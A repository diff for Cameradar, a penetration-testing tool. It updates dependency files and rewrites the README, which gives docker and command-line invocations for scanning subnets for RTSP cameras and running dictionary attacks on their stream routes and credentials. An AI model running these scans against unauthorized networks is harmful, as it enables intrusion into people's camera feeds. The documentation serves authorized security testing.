|
||||
pruneopts = "UT"
|
||||
revision = "c2353362d570a7bfa228149c62842019201cfb71"
|
||||
version = "v1.8.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:c658e84ad3916da105a761660dcaeb01e63416c8ec7bc62256a9b411a05fcd67"
|
||||
name = "github.com/mattn/go-colorable"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "167de6bfdfba052fa6b2d3664c8f5272e23c9072"
|
||||
version = "v0.0.9"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:0981502f9816113c9c8c4ac301583841855c8cf4da8c72f696b3ebedf6d0e4e5"
|
||||
name = "github.com/mattn/go-isatty"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "6ca4dbf54d38eea1a992b3c722a76a5d1c4cb25c"
|
||||
version = "v0.0.4"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:53bc4cd4914cd7cd52139990d5170d6dc99067ae31c56530621b18b35fc30318"
|
||||
name = "github.com/mitchellh/mapstructure"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "3536a929edddb9a5b34bd6861dc4a9647cb459fe"
|
||||
version = "v1.1.2"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:95741de3af260a92cc5c7f3f3061e85273f5a81b5db20d4bd68da74bd521675e"
|
||||
name = "github.com/pelletier/go-toml"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "c01d1270ff3e442a8a57cddc1c92dc1138598194"
|
||||
version = "v1.2.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:40e195917a951a8bf867cd05de2a46aaf1806c50cf92eebf4c16f78cd196f747"
|
||||
name = "github.com/pkg/errors"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "645ef00459ed84a119197bfb8d8205042c6df63d"
|
||||
version = "v0.8.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:0028cb19b2e4c3112225cd871870f2d9cf49b9b4276531f03438a88e94be86fe"
|
||||
name = "github.com/pmezard/go-difflib"
|
||||
packages = ["difflib"]
|
||||
pruneopts = "UT"
|
||||
revision = "792786c7400a136282c1664665ae0a8db921c6c2"
|
||||
version = "v1.0.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:d707dbc1330c0ed177d4642d6ae102d5e2c847ebd0eb84562d0dc4f024531cfc"
|
||||
name = "github.com/spf13/afero"
|
||||
packages = [
|
||||
".",
|
||||
"mem",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "a5d6946387efe7d64d09dcba68cdd523dc1273a3"
|
||||
version = "v1.2.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:08d65904057412fc0270fc4812a1c90c594186819243160dc779a402d4b6d0bc"
|
||||
name = "github.com/spf13/cast"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "8c9545af88b134710ab1cd196795e7f2388358d7"
|
||||
version = "v1.3.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:68ea4e23713989dc20b1bded5d9da2c5f9be14ff9885beef481848edd18c26cb"
|
||||
name = "github.com/spf13/jwalterweatherman"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "4a4406e478ca629068e7768fc33f3f044173c0a6"
|
||||
version = "v1.0.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:c1b1102241e7f645bc8e0c22ae352e8f0dc6484b6cb4d132fa9f24174e0119e2"
|
||||
name = "github.com/spf13/pflag"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "298182f68c66c05229eb03ac171abe6e309ee79a"
|
||||
version = "v1.0.3"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:de37e343c64582d7026bf8ab6ac5b22a72eac54f3a57020db31524affed9f423"
|
||||
name = "github.com/spf13/viper"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "6d33b5a963d922d182c91e8a1c88d81fd150cfd4"
|
||||
version = "v1.3.1"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:ac83cf90d08b63ad5f7e020ef480d319ae890c208f8524622a2f3136e2686b02"
|
||||
name = "github.com/stretchr/objx"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "477a77ecc69700c7cdeb1fa9e129548e1c1c393c"
|
||||
version = "v0.1.1"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:15a4a7e5afac3cea801fa24831fce3bf3b5bd3620cbf8355a07b7dbf06877883"
|
||||
name = "github.com/stretchr/testify"
|
||||
packages = [
|
||||
"assert",
|
||||
"mock",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "f35b8ab0b5a2cef36673838d662e249dd9c94686"
|
||||
version = "v1.2.2"
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
digest = "1:38f553aff0273ad6f367cb0a0f8b6eecbaef8dc6cb8b50e57b6a81c1d5b1e332"
|
||||
name = "golang.org/x/crypto"
|
||||
packages = ["ssh/terminal"]
|
||||
pruneopts = "UT"
|
||||
revision = "505ab145d0a99da450461ae2c1a9f6cd10d1f447"
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
digest = "1:3d5e79e10549fd9119cbefd614b6d351ef5bd0be2f2b103a4199788e784cbc68"
|
||||
name = "golang.org/x/sys"
|
||||
packages = [
|
||||
"unix",
|
||||
"windows",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "b4a75ba826a64a70990f11a225237acd6ef35c9f"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:8029e9743749d4be5bc9f7d42ea1659471767860f0cdc34d37c3111bd308a295"
|
||||
name = "golang.org/x/text"
|
||||
packages = [
|
||||
"internal/gen",
|
||||
"internal/triegen",
|
||||
"internal/ucd",
|
||||
"transform",
|
||||
"unicode/cldr",
|
||||
"unicode/norm",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "f21a4dfb5e38f5895301dc265a8def02365cc3d0"
|
||||
version = "v0.3.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:8abc978192c2fca4d6a74260c3a8f4aa34d25bd3c548c938745b91b8b20cda1d"
|
||||
name = "gopkg.in/go-playground/validator.v9"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "0277b12d53df79c9dbf7311cb07fa9c81ed621bb"
|
||||
version = "v9.24.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:4d2e5a73dc1500038e504a8d78b986630e3626dc027bc030ba5c75da257cdb96"
|
||||
name = "gopkg.in/yaml.v2"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "51d6538a90f86fe93ac480b35f37b2be17fef232"
|
||||
version = "v2.2.2"
|
||||
|
||||
[solve-meta]
|
||||
analyzer-name = "dep"
|
||||
analyzer-version = 1
|
||||
input-imports = [
|
||||
"github.com/Ullaakut/cameradar",
|
||||
"github.com/Ullaakut/nmap",
|
||||
"github.com/andelf/go-curl",
|
||||
"github.com/fatih/color",
|
||||
"github.com/gernest/wow",
|
||||
"github.com/gernest/wow/spin",
|
||||
"github.com/pkg/errors",
|
||||
"github.com/spf13/pflag",
|
||||
"github.com/spf13/viper",
|
||||
"github.com/stretchr/testify/assert",
|
||||
"github.com/stretchr/testify/mock",
|
||||
"gopkg.in/go-playground/validator.v9",
|
||||
]
|
||||
solver-name = "gps-cdcl"
|
||||
solver-version = 1
|
||||
-54
@@ -1,54 +0,0 @@
|
||||
# Gopkg.toml example
|
||||
#
|
||||
# Refer to https://golang.github.io/dep/docs/Gopkg.toml.html
|
||||
# for detailed Gopkg.toml documentation.
|
||||
#
|
||||
# required = ["github.com/user/thing/cmd/thing"]
|
||||
# ignored = ["github.com/user/project/pkgX", "bitbucket.org/user/project/pkgA/pkgY"]
|
||||
#
|
||||
# [[constraint]]
|
||||
# name = "github.com/user/project"
|
||||
# version = "1.0.0"
|
||||
#
|
||||
# [[constraint]]
|
||||
# name = "github.com/user/project2"
|
||||
# branch = "dev"
|
||||
# source = "github.com/myfork/project2"
|
||||
#
|
||||
# [[override]]
|
||||
# name = "github.com/x/y"
|
||||
# version = "2.4.0"
|
||||
#
|
||||
# [prune]
|
||||
# non-go = false
|
||||
# go-tests = true
|
||||
# unused-packages = true
|
||||
|
||||
|
||||
[[constraint]]
|
||||
branch = "master"
|
||||
name = "github.com/andelf/go-curl"
|
||||
|
||||
[[constraint]]
|
||||
name = "github.com/fatih/color"
|
||||
version = "1.7.0"
|
||||
|
||||
[[constraint]]
|
||||
branch = "master"
|
||||
name = "github.com/gernest/wow"
|
||||
|
||||
[[constraint]]
|
||||
name = "github.com/spf13/pflag"
|
||||
version = "1.0.3"
|
||||
|
||||
[[constraint]]
|
||||
name = "github.com/spf13/viper"
|
||||
version = "1.3.1"
|
||||
|
||||
[[constraint]]
|
||||
name = "github.com/stretchr/testify"
|
||||
version = "1.2.2"
|
||||
|
||||
[prune]
|
||||
go-tests = true
|
||||
unused-packages = true
|
||||
@@ -1,51 +0,0 @@
|
||||
First, make sure that none of the open and closed issues is about the same issue as you are describing, and make sure to check the frequently asked questions in the README file.
|
||||
Then, replace the parts of this template that are between <angle brackets> with the data relative to your issue.
|
||||
|
||||
**If you're reporting a bug, use the template below. Otherwise, delete this template and write your issue normally.**
|
||||
|
||||
## Context
|
||||
|
||||
Please select one:
|
||||
|
||||
- [ ] I use the docker image `ullaakut/cameradar`
|
||||
- [ ] I use my own build of the docker image
|
||||
- [ ] I use the pre-compiled binary
|
||||
- [ ] I use my own build of the binary
|
||||
- [ ] None of the above / I don't know
|
||||
|
||||
Please select one:
|
||||
|
||||
- [ ] I use a specific version: <version tag>
|
||||
- [ ] I use the latest commit of the master branch
|
||||
- [ ] I use the latest commit of the develop branch
|
||||
- [ ] I use a forked version of the repository: <fork URL>
|
||||
- [ ] I use a specific commit: <commit hash>
|
||||
|
||||
## Environment
|
||||
|
||||
My operating system:
|
||||
- [ ] Windows
|
||||
- [ ] OSX
|
||||
- [ ] Linux
|
||||
- [ ] Other
|
||||
|
||||
OS version: <version>
|
||||
OS architecture: <architecture>
|
||||
|
||||
## Issue
|
||||
|
||||
### What was expected?
|
||||
|
||||
<expected behavior>
|
||||
|
||||
### What happened?
|
||||
|
||||
<observed behavior>
|
||||
|
||||
### Logs
|
||||
|
||||
If your issue is with Cameradar's binary or docker image, please run it with `-l` to print logs, and paste them here:
|
||||
|
||||
```
|
||||
<cameradar logs>
|
||||
```
|
||||
@@ -0,0 +1,28 @@
|
||||
# set this e.g. via `make build GORELEASER_FLAGS="--skip=docker"` for temporary flags
|
||||
GORELEASER_FLAGS=
|
||||
|
||||
#Format
|
||||
|
||||
fmt:
|
||||
@echo "==> Formatting source"
|
||||
@gofmt -s -w $(shell find . -type f -name '*.go')
|
||||
@echo "==> Done"
|
||||
.PHONY: fmt
|
||||
|
||||
#Test
|
||||
|
||||
test:
|
||||
@go test -cover -race ./...
|
||||
.PHONY: test
|
||||
|
||||
#Lint
|
||||
|
||||
lint:
|
||||
@golangci-lint run --config=.golangci.yml ./...
|
||||
.PHONY: lint
|
||||
|
||||
#Build
|
||||
|
||||
build:
|
||||
@goreleaser release $(GORELEASER_FLAGS) --clean --snapshot
|
||||
.PHONY: build
|
||||
@@ -1,8 +1,4 @@
|
||||
# Cameradar
|
||||
|
||||
<p align="center">
|
||||
<img src="https://raw.githubusercontent.com/Ullaakut/cameradar/master/images/Cameradar.gif" width="100%"/>
|
||||
</p>
|
||||
## Cameradar
|
||||
|
||||
<p align="center">
|
||||
<a href="#license">
|
||||
@@ -11,175 +7,262 @@
|
||||
<a href="https://hub.docker.com/r/ullaakut/cameradar/">
|
||||
<img src="https://img.shields.io/docker/pulls/ullaakut/cameradar.svg?style=flat" />
|
||||
</a>
|
||||
<a href="https://travis-ci.org/Ullaakut/cameradar">
|
||||
<img src="https://travis-ci.org/Ullaakut/cameradar.svg?branch=master" />
|
||||
<a href="https://github.com/Ullaakut/cameradar/actions">
|
||||
<img src="https://img.shields.io/github/actions/workflow/status/Ullaakut/cameradar/build.yaml" />
|
||||
</a>
|
||||
<a href='https://coveralls.io/github/Ullaakut/cameradar?branch=master'>
|
||||
<img src='https://coveralls.io/repos/github/Ullaakut/cameradar/badge.svg?branch=master' alt='Coverage Status' />
|
||||
</a>
|
||||
<a href="https://golangci.com/r/github.com/Ullaakut/cameradar">
|
||||
<img src="https://golangci.com/badges/github.com/Ullaakut/cameradar.svg" />
|
||||
<a href="https://goreportcard.com/report/github.com/ullaakut/cameradar">
|
||||
<img src="https://goreportcard.com/badge/github.com/ullaakut/cameradar" />
|
||||
</a>
|
||||
<a href="https://goreportcard.com/report/github.com/Ullaakut/cameradar">
|
||||
<img src="https://goreportcard.com/badge/github.com/Ullaakut/cameradar" />
|
||||
</a>
|
||||
<a href="https://github.com/Ullaakut/cameradar/releases/latest">
|
||||
<a href="https://github.com/ullaakut/cameradar/releases/latest">
|
||||
<img src="https://img.shields.io/github/release/Ullaakut/cameradar.svg?style=flat" />
|
||||
</a>
|
||||
<a href="https://godoc.org/github.com/Ullaakut/cameradar">
|
||||
<img src="https://godoc.org/github.com/Ullaakut/cameradar?status.svg" />
|
||||
<a href="https://pkg.go.dev/github.com/ullaakut/cameradar">
|
||||
<img src="https://godoc.org/github.com/ullaakut/cameradar?status.svg" />
|
||||
</a>
|
||||
</p>
|
||||
|
||||
## An RTSP stream access tool that comes with its library
|
||||
## RTSP stream access tool
|
||||
|
||||
### Cameradar allows you to
|
||||
Cameradar scans RTSP endpoints on authorized targets, and uses dictionary attacks to bruteforce their credentials and routes.
|
||||
|
||||
* **Detect open RTSP hosts** on any accessible target host
|
||||
* Detect which device model is streaming
|
||||
* Launch automated dictionary attacks to get their **stream route** (e.g.: `/live.sdp`)
|
||||
* Launch automated dictionary attacks to get the **username and password** of the cameras
|
||||
* Retrieve a complete and user-friendly report of the results
|
||||
### What Cameradar does
|
||||
|
||||
<p align="center"><img src="https://raw.githubusercontent.com/Ullaakut/cameradar/master/images/Cameradar.png" width="250"/></p>
|
||||
- Detects open RTSP hosts on accessible targets.
|
||||
- Detects the device model that streams the RTSP feed.
|
||||
- Attempts dictionary-based discovery of stream routes (for example, `/live.sdp`).
|
||||
- Attempts dictionary-based discovery of camera credentials.
|
||||
- Produces a report of findings.
|
||||
|
||||
## Table of content
|
||||
<p align="center"><img src="images/Cameradar.png" width="250"/></p>
|
||||
|
||||
* [Docker Image](#docker-image)
|
||||
* [Configuration](#configuration)
|
||||
* [Output](#output)
|
||||
* [Check camera access](#check-camera-access)
|
||||
* [Command line options](#command-line-options)
|
||||
* [Contribution](#contribution)
|
||||
* [Frequently Asked Questions](#frequently-asked-questions)
|
||||
* [License](#license)
|
||||
## Table of contents
|
||||
|
||||
## Docker Image for Cameradar
|
||||
- [Quick start with Docker](#quick-start-with-docker)
|
||||
- [Install the binary](#install-the-binary)
|
||||
- [Install on Android (Termux)](#install-on-android-termux)
|
||||
- [Configuration](#configuration)
|
||||
- [Security and responsible use](#security-and-responsible-use)
|
||||
- [Output](#output)
|
||||
- [Check camera access](#check-camera-access)
|
||||
- [Command-line options](#command-line-options)
|
||||
- [Input file format](#input-file-format)
|
||||
- [Environment variables](#environment-variables)
|
||||
- [Build and contribute](#build-and-contribute)
|
||||
- [Frequently asked questions](#frequently-asked-questions)
|
||||
- [Examples](#examples)
|
||||
- [License](#license)
|
||||
|
||||
Install [docker](https://docs.docker.com/engine/installation/) on your machine, and run the following command:
|
||||
---
|
||||
|
||||
<p align="center"><img src="images/example.gif"/></p>
|
||||
|
||||
## Quick start with Docker
|
||||
|
||||
Install [Docker](https://docs.docker.com/engine/installation/) and run:
|
||||
|
||||
```bash
|
||||
docker run -t ullaakut/cameradar -t <target> <other command-line options>
|
||||
docker run --rm -t --net=host ullaakut/cameradar --targets <target>
|
||||
```
|
||||
|
||||
[See command-line options](#command-line-options).
|
||||
Example:
|
||||
|
||||
e.g.: `docker run -t ullaakut/cameradar -t 192.168.100.0/24 -l` will scan the ports 554, 5554 and 8554 of hosts on the 192.168.100.0/24 subnetwork and attack the discovered RTSP streams and will output debug logs.
|
||||
```bash
|
||||
docker run --rm -t --net=host ullaakut/cameradar --targets 192.168.100.0/24
|
||||
```
|
||||
|
||||
* `YOUR_TARGET` can be a subnet (e.g.: `172.16.100.0/24`), an IP (e.g.: `172.16.100.10`), or a range of IPs (e.g.: `172.16.100.10-20`).
|
||||
* If you want to get the precise results of the nmap scan in the form of an XML file, you can add `-v /your/path:/tmp/cameradar_scan.xml` to the docker run command, before `ullaakut/cameradar`.
|
||||
* If you use the `-r` and `-c` options to specify your custom dictionaries, make sure to also use a volume to add them to the docker container. Example: `docker run -t -v /path/to/dictionaries/:/tmp/ ullaakut/cameradar -r /tmp/myroutes -c /tmp/mycredentials.json -t mytarget`
|
||||
This scans ports 554, 5554, and 8554 on the target subnet.
|
||||
It attempts to enumerate RTSP streams.
|
||||
For all options, see [command-line options](#command-line-options).
|
||||
|
||||
## Installing the binary on your machine
|
||||
- Targets can be CIDRs, IPs, IP ranges or a hostname.
|
||||
- Subnet: `172.16.100.0/24`
|
||||
- IP: `172.16.100.10`
|
||||
- Host: `localhost`
|
||||
- Range: `172.16.100.10-20`
|
||||
|
||||
Only use this solution if for some reason using docker is not an option for you or if you want to locally build Cameradar on your machine.
|
||||
- To use custom dictionaries, mount them and pass both flags:
|
||||
|
||||
```bash
|
||||
docker run --rm -t --net=host \
|
||||
-v /path/to/dictionaries:/tmp/dictionaries \
|
||||
ullaakut/cameradar \
|
||||
--custom-routes /tmp/dictionaries/my_routes \
|
||||
--custom-credentials /tmp/dictionaries/my_credentials.json \
|
||||
--targets 192.168.100.0/24
|
||||
```
|
||||
|
||||
## Install the binary
|
||||
|
||||
Use this option if Docker is not available or if you want a local build.
|
||||
|
||||
### Dependencies
|
||||
|
||||
* `go`
|
||||
* `dep`
|
||||
- Go 1.25 or later
|
||||
|
||||
#### Installing dep
|
||||
### Steps
|
||||
|
||||
* OSX: `brew install dep` and `brew upgrade dep`
|
||||
* Others: Download the release package for your OS [here](https://github.com/golang/dep/releases)
|
||||
1. `go install github.com/Ullaakut/cameradar/v6/cmd/cameradar@latest`
|
||||
|
||||
### Steps to install
|
||||
The `cameradar` binary is now in your `$GOPATH/bin`.
|
||||
For available flags, see [command-line options](#command-line-options).
|
||||
|
||||
Make sure you installed the dependencies mentionned above.
|
||||
## Install on Android (Termux)
|
||||
|
||||
1. `go get github.com/Ullaakut/cameradar`
|
||||
2. `cd $GOPATH/src/github.com/Ullaakut/cameradar`
|
||||
3. `dep ensure`
|
||||
4. `cd cameradar`
|
||||
5. `go install`
|
||||
These steps summarize a working Termux setup for Android.
|
||||
Use Termux 117 from F-Droid or the official Termux site, not Google Play.
|
||||
|
||||
The `cameradar` binary is now in your `$GOPATH/bin` ready to be used. See command line options [here](#command-line-options).
|
||||
### 1) Set up Termux and Alpine
|
||||
|
||||
## Library
|
||||
Install the required packages in Termux:
|
||||
|
||||
### Dependencies of the library
|
||||
```bash
|
||||
pkg update
|
||||
pkg install mc wget git nmap proot-distro
|
||||
```
|
||||
|
||||
* `curl-dev` / `libcurl` (depending on your OS)
|
||||
* `nmap`
|
||||
* `github.com/pkg/errors`
|
||||
* `gopkg.in/go-playground/validator.v9`
|
||||
* `github.com/andelf/go-curl`
|
||||
Install Alpine and log in:
|
||||
|
||||
#### Installing the library
|
||||
```bash
|
||||
proot-distro install alpine
|
||||
proot-distro login alpine
|
||||
```
|
||||
|
||||
`go get github.com/Ullaakut/cameradar`
|
||||
### 2) Install build tools in Alpine
|
||||
|
||||
After this command, the _cameradar_ library is ready to use. Its source will be in:
|
||||
```bash
|
||||
apk add wget git go gcc clang musl-dev make
|
||||
```
|
||||
|
||||
$GOPATH/src/pkg/github.com/Ullaakut/cameradar
|
||||
### 3) Build Cameradar
|
||||
|
||||
You can use `go get -u` to update the package.
|
||||
Create a module path and clone the repo:
|
||||
|
||||
Here is an overview of the exposed functions of this library:
|
||||
```bash
|
||||
mkdir -p go/pkg/mod/github.com/Ullaakut
|
||||
cd go/pkg/mod/github.com/Ullaakut
|
||||
git clone https://github.com/Ullaakut/cameradar.git
|
||||
cd cameradar/cmd/cameradar
|
||||
go install
|
||||
```
|
||||
|
||||
#### Discovery
|
||||
### 4) Run Cameradar
|
||||
|
||||
You can use the cameradar library for simple discovery purposes if you don't need to access the cameras but just to be aware of their existence.
|
||||
Copy dictionaries and run the binary:
|
||||
|
||||
<p align="center"><img width="90%" src="https://raw.githubusercontent.com/Ullaakut/cameradar/master/images/NmapPresets.png"/></p>
|
||||
This describes the nmap time presets. You can pass a value between 1 and 5 as described in this table, to the NmapRun function.
|
||||
```bash
|
||||
mkdir -p /tmp
|
||||
cp -r ../../dictionaries /tmp/dictionaries
|
||||
/go/bin/cameradar --targets=<target> --custom-credentials=/tmp/dictionaries/credentials.json --custom-routes=/tmp/dictionaries/routes --ui=plain --debug
|
||||
```
|
||||
|
||||
#### Attack
|
||||
|
||||
If you already know which hosts and ports you want to attack, you can also skip the discovery part and use directly the attack functions. The attack functions also take a timeout value as a parameter.
|
||||
|
||||
#### Data models
|
||||
|
||||
Here are the different data models useful to use the exposed functions of the cameradar library.
|
||||
|
||||
<p align="center"><img width="60%" src="https://raw.githubusercontent.com/Ullaakut/cameradar/master/images/Models.png"/></p>
|
||||
|
||||
#### Dictionary loaders
|
||||
|
||||
The cameradar library also provides two functions that take file paths as inputs and return the appropriate data models filled.
|
||||
Replace `<target>` with an IP, range, host or subnet you are authorized to test.
|
||||
|
||||
## Configuration
|
||||
|
||||
The **RTSP port used for most cameras is 554**, so you should probably specify 554 as one of the ports you scan. Not specifying any ports to the cameradar application will scan the 554, 5554 and 8554 ports.
|
||||
The default RTSP ports are `554`, `5554`, `8554`.
|
||||
If you do not specify ports, Cameradar uses those.
|
||||
|
||||
`docker run -t --net=host ullaakut/cameradar -p "18554,19000-19010" -t localhost` will scan the ports 18554, and the range of ports between 19000 and 19010 on localhost.
|
||||
|
||||
You **can use your own files for the ids and routes dictionaries** used to attack the cameras, but the Cameradar repository already gives you a good base that works with most cameras, in the `/dictionaries` folder.
|
||||
Example of scanning custom ports:
|
||||
|
||||
```bash
|
||||
docker run -t -v /my/folder/with/dictionaries:/tmp/dictionaries \
|
||||
ullaakut/cameradar \
|
||||
-r "/tmp/dictionaries/my_routes" \
|
||||
-c "/tmp/dictionaries/my_credentials.json" \
|
||||
-t 172.19.124.0/24
|
||||
docker run --rm -t --net=host \
|
||||
ullaakut/cameradar \
|
||||
--ports "18554,19000-19010" \
|
||||
--targets localhost
|
||||
```
|
||||
|
||||
This will put the contents of your folder containing dictionaries in the docker image and will use it for the dictionary attack instead of the default dictionaries provided in the cameradar repo.
|
||||
You can replace the default dictionaries with your own routes and credentials files.
|
||||
The repository provides baseline dictionaries in the `dictionaries` folder.
|
||||
|
||||
```bash
|
||||
docker run --rm -t --net=host \
|
||||
-v /my/folder/with/dictionaries:/tmp/dictionaries \
|
||||
ullaakut/cameradar \
|
||||
--custom-routes /tmp/dictionaries/my_routes \
|
||||
--custom-credentials /tmp/dictionaries/my_credentials.json \
|
||||
--targets 172.19.124.0/24
|
||||
```
|
||||
|
||||
### Skip discovery with `--skip-scan`
|
||||
|
||||
If you already know the RTSP endpoints, you can skip discovery and treat each
|
||||
target and port as a stream candidate. This mode does not run discovery and can be
|
||||
useful on restricted networks or when you want to attack a known inventory.
|
||||
|
||||
Skipping discovery means:
|
||||
|
||||
- Cameradar does not run discovery and does not detect device models.
|
||||
- Targets resolve to IP addresses. Hostnames resolve via DNS.
|
||||
- CIDR blocks and IPv4 ranges expand to every address in the range.
|
||||
- Large ranges create many targets, so use them carefully.
|
||||
|
||||
Example:
|
||||
|
||||
```bash
|
||||
docker run --rm -t --net=host \
|
||||
ullaakut/cameradar \
|
||||
--skip-scan \
|
||||
--ports "554,8554" \
|
||||
--targets 192.168.1.10
|
||||
```
|
||||
|
||||
In this example, Cameradar attempts dictionary attacks against
|
||||
ports 554 and 8554 of `192.168.1.10`.
|
||||
|
||||
### Choose the discovery scanner with `--scanner`
|
||||
|
||||
Cameradar supports two discovery backends:
|
||||
|
||||
- `nmap` (default)
|
||||
- `masscan`
|
||||
|
||||
Use `nmap` when you want more reliable RTSP discovery: it performs service
|
||||
identification and can better distinguish RTSP from other open ports.
|
||||
|
||||
Use `masscan` when scanning very large networks: it is generally faster and
|
||||
more efficient at scale, but it does not provide service discovery.
|
||||
|
||||
```bash
|
||||
docker run --rm -t --net=host \
|
||||
ullaakut/cameradar \
|
||||
--scanner masscan \
|
||||
--ports "554,8554" \
|
||||
--targets 192.168.1.0/24
|
||||
```
|
||||
|
||||
> [!WARNING]
|
||||
> `--scan-speed` only applies to the `nmap` scanner.
|
||||
|
||||
## Security and responsible use
|
||||
|
||||
Cameradar is a penetration testing tool.
|
||||
Only scan networks and devices you own or have explicit permission to test.
|
||||
Do not use this tool to access unauthorized systems or streams.
|
||||
If you are unsure, stop and get written approval before scanning.
|
||||
|
||||
## Output
|
||||
|
||||
Cameradar presents results in a readable terminal UI.
|
||||
It logs findings to the console.
|
||||
The report includes discovered hosts, identified device models, and valid routes or credentials.
|
||||
If you specify a path for the `--output` flag, Cameradar also writes an M3U playlist with the discovered streams.
|
||||
|
||||
## Check camera access
|
||||
|
||||
If you have [VLC Media Player](http://www.videolan.org/vlc/), you should be able to use the GUI or the command-line to connect to the RTSP stream using this format : `rtsp://username:password@address:port/route`
|
||||
Use [VLC Media Player](http://www.videolan.org/vlc/) to connect to a stream:
|
||||
|
||||
With the above result, the RTSP URL would be `rtsp://admin:12345@173.16.100.45:554/live.sdp`
|
||||
`rtsp://username:password@address:port/route`
|
||||
|
||||
## Command line options
|
||||
## Input file format
|
||||
|
||||
* **"-t, --targets"**: Set target. Required. Target can be a file (see [instructions on how to format the file](#format-input-file)), an IP, an IP range, a subnetwork, or a combination of those. Example: `--targets="192.168.1.72,192.168.1.74"`
|
||||
* **"-p, --ports"**: (Default: `554,5554,8554`) Set custom ports.
|
||||
* **"-s, --speed"**: (Default: `4`) Set custom nmap discovery presets to improve speed or accuracy. It's recommended to lower it if you are attempting to scan an unstable and slow network, or to increase it if on a very performant and reliable network. You might also want to keep it low to keep your discovery stealthy. See [this for more info on the nmap timing templates](https://nmap.org/book/man-performance.html).
|
||||
* **"-T, --timeout"**: (Default: `2000`) Set custom timeout value in miliseconds after which an attack attempt without an answer should give up. It's recommended to increase it when attempting to scan unstable and slow networks or to decrease it on very performant and reliable networks.
|
||||
* **"-r, --custom-routes"**: (Default: `<CAMERADAR_GOPATH>/dictionaries/routes`) Set custom dictionary path for routes
|
||||
* **"-c, --custom-credentials"**: (Default: `<CAMERADAR_GOPATH>/dictionaries/credentials.json`) Set custom dictionary path for credentials
|
||||
* **"-o, --nmap-output"**: (Default: `/tmp/cameradar_scan.xml`) Set custom nmap output path
|
||||
* **"-l, --log"**: Enable debug logs (nmap requests, curl describe requests, etc.)
|
||||
* **"-h"** : Display the usage information
|
||||
The file can contain IPs, hostnames, IP ranges, and subnets.
|
||||
Separate entries with newlines.
|
||||
Example:
|
||||
|
||||
## Format input file
|
||||
|
||||
The file can contain IPs, hostnames, IP ranges and subnetwork, separated by newlines. Example:
|
||||
|
||||
```go
|
||||
```text
|
||||
0.0.0.0
|
||||
localhost
|
||||
192.17.0.0/16
|
||||
@@ -187,11 +270,15 @@ localhost
|
||||
192.168.2-3.0-255
|
||||
```
|
||||
|
||||
## Environment Variables
|
||||
When you use `--skip-scan`, Cameradar expands each entry into explicit IP
|
||||
addresses before building the target list.
|
||||
|
||||
### `CAMERADAR_TARGET`
|
||||
## Options
|
||||
|
||||
This variable is mandatory and specifies the target that cameradar should scan and attempt to access RTSP streams on.
|
||||
### `TARGETS` / `--targets` / `-t`
|
||||
|
||||
This variable is required.
|
||||
It specifies the target that Cameradar scans and attempts to access.
|
||||
|
||||
Examples:
|
||||
|
||||
@@ -201,131 +288,182 @@ Examples:
|
||||
* `192.168.1.140-255`
|
||||
* `192.168.2-3.0-255`
|
||||
|
||||
### `CAMERADAR_PORTS`
|
||||
### `PORTS` / `--ports` / `-p`
|
||||
|
||||
This variable is optional and allows you to specify the ports on which to run the scans.
|
||||
This variable is optional and allows you to specify the ports to scan.
|
||||
|
||||
Default value: `554,5554,8554`
|
||||
|
||||
It is recommended not to change these except if you are certain that cameras have been configured to stream RTSP over a different port. 99.9% of cameras are streaming on these ports.
|
||||
Change these only if you are sure cameras stream over different ports.
|
||||
Most cameras use these defaults.
|
||||
|
||||
### `CAMERADAR_NMAP_OUTPUT_FILE`
|
||||
### `CUSTOM_ROUTES` / `--custom-routes` / `-r`
|
||||
|
||||
This variable is optional and allows you to specify on which file nmap will write its output.
|
||||
This option is optional.
|
||||
It replaces the default routes dictionary used for the dictionary attack.
|
||||
|
||||
Default value: `/tmp/cameradar_scan.xml`
|
||||
If unset, Cameradar uses the built-in routes dictionary.
|
||||
|
||||
This can be useful only if you want to read the files yourself, if you don't want it to write in your `/tmp` folder, or if you want to use only the RunNmap function in cameradar, and do its parsing manually.
|
||||
### `CUSTOM_CREDENTIALS` / `--custom-credentials` / `-c`
|
||||
|
||||
### `CAMERADAR_CUSTOM_ROUTES`, `CAMERADAR_CUSTOM_CREDENTIALS`
|
||||
This option is optional.
|
||||
It replaces the default credentials dictionary used for the dictionary attack.
|
||||
|
||||
These variables are optional, allowing to replace the default dictionaries with custom ones, for the dictionary attack.
|
||||
If unset, Cameradar uses the built-in credentials dictionary.
|
||||
|
||||
Default values: `<CAMERADAR_GOPATH>/dictionaries/routes` and `<CAMERADAR_GOPATH>/dictionaries/credentials.json`
|
||||
